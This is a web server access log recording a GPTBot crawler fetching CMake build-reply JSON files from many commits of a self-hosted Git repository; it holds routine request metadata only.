git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13747] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35757] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=source" [Client 74.7.227.38] [Length 12843] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:19:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13722] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=rendered" [Client 74.7.227.38] [Length 11162] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:19:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11163] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:48:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13622] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:48:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:48:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13596] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12792] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13745] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=rendered" [Client 74.7.227.38] [Length 11163] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:19:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35754] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:19:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:19:48:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:48:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12793] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=rendered" [Client 74.7.227.38] [Length 11133] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:19:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:48:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:48:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:48:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:48:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13748] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:48:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=source" [Client 74.7.227.38] [Length 12874] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:19:48:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11124] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:48:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11162] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:48:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:19:48:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:48:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:48:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:48:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:48:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13623] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:48:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35757] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:48:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13748] [Gzip 4.69] [Sent-to 192.168.0.250] 